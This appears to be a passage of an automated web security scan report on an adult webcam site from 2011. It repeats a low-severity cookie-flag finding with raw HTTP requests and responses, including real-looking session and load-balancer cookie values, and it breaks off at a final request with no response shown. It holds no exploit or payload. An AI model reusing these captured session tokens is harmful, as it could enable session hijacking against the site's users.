<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /webcam-sign-up/
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:52 GMT
Connection: close
Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:45 GMT
Connection: close
Content-Length: 24651
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /becomehost.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 20899 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:17 GMT Connection: close Content-Length: 18918 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 21809 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /disclaimer.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:24 GMT Connection: close Content-Length: 78840 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:54 GMT Connection: close Content-Length: 39880 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:02 GMT Connection: close Content-Length: 25126 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:36 GMT Connection: close Content-Length: 220458 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:38 GMT Connection: close Content-Length: 27140 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /webcam-sign-up/ Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:41 GMT Connection: close Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
